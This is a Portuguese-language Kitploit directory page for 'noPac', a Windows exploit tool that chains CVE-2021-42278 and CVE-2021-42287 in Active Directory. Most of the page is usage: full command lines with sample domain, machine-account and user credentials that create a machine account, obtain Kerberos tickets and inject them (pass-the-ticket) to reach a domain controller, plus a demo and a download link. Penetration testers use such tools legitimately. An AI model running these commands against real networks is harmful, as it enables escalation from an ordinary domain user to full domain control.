Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
noPac — CVE-2021-42287/CVE-2021-42278 Explorador | Kitploit
Ferramentas/GitHubGitHub/trya9ain/nopac
Autenticação e AutorizaçãoEscalada de PrivilégiosAnálise de VulnerabilidadesExploraçãoTestes de Penetração
GitHubtrya9ain/nopac

noPac

CVE-2021-42287/CVE-2021-42278 Explorador

Ver Repositório
141há 3 anosAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

noPac

Este projeto teve origem no estudo dos princípios do noPac, com algumas alterações baseadas no projeto cube0x0. O código-fonte foi enriquecido com comentários pessoais de compreensão.

  • Removida a funcionalidade Scan, pois considero a função Scan bastante inútil.
  • Adicionada a verificação do valor de MachineAccountQuota; se for 0, o programa é encerrado.
  • Otimizado o tratamento de julgamento ao adicionar uma conta de máquina.
  • Adicionada a saída do TGT.

O artigo de análise da vulnerabilidade pode ser consultado no meu blog: Análise do noPac

Condições de Exploração

noPac é uma combinação das vulnerabilidades CVE-2021-42278 (falsificação de sAMAccountName) e CVE-2021-42287 (engano do KDC). A exploração bem-sucedida requer que ambas as vulnerabilidades sejam satisfeitas simultaneamente.

Método de Uso

root@kitploit:~
Examples: Get TGT and ST

  noPac.exe /domain DomainName /dc DomainController /mAccount MachineAccount /mPassword MachineAccountPassword /user DomainUser /pass DomainUserPassword

  noPac.exe /domain missyou.com /dc dc.missyou.com /mAccount test1b$ /mPassword "TesT1b13!#@" /user wanglei /pass wanglei

  noPac.exe /domain DomainName /dc DomainController /mAccount MachineAccount /mPassword MachineAccountPassword /user DomainUser /pass DomainUserPassword /service altservice

  noPac.exe /domain missyou.com /dc dc.missyou.com /mAccount test1b$ /mPassword "TesT1b13!#@" /user wanglei /pass wanglei /service cifs

Examples: PTT

  noPac.exe /domain DomainName /dc DomainController /mAccount MachineAccount /mPassword MachineAccountPassword /user DomainUser /pass DomainUserPassword /service altservice /ptt

  noPac.exe /domain missyou.com /dc dc.missyou.com /mAccount test1b$ /mPassword "TesT1b13!#@" /user wanglei /pass wanglei /service cifs /ptt

  noPac.exe /domain missyou.com /dc dc.missyou.com /mAccount test1b /mPassword "TesT1b13!#@" /user wanglei /pass wanglei /service cifs /ptt

O método mais comum é o PTT:

root@kitploit:~
noPac.exe /domain missyou.com /dc dc.missyou.com /mAccount test1b$ /mPassword "TesT1b13!#@" /user wanglei /pass wanglei /service cifs /ptt

Demonstração

Não foi possível acessar o DC antes de explorar o noPac.

Explorando noPac.

root@kitploit:~
noPac.exe /domain missyou.com /dc dc.missyou.com /mAccount test1b$ /mPassword "TesT1b13!#@" /user wanglei /pass wanglei /service cifs /ptt

Após o PTT, acesse novamente o DC na mesma janela para obter acesso bem-sucedido.

Ambiente de Exploração

Observe que o programa só pode ser executado em máquinas com ambiente .NET 4.0+. O Windows Server 2012 já inclui o .NET 4.0 por padrão, enquanto o Windows Server 2008 inclui o .NET 3.5.

Para verificar a versão do .NET na máquina:

root@kitploit:~
dir c:\Windows\Microsoft.NET\Framework64

Baixar ferramenta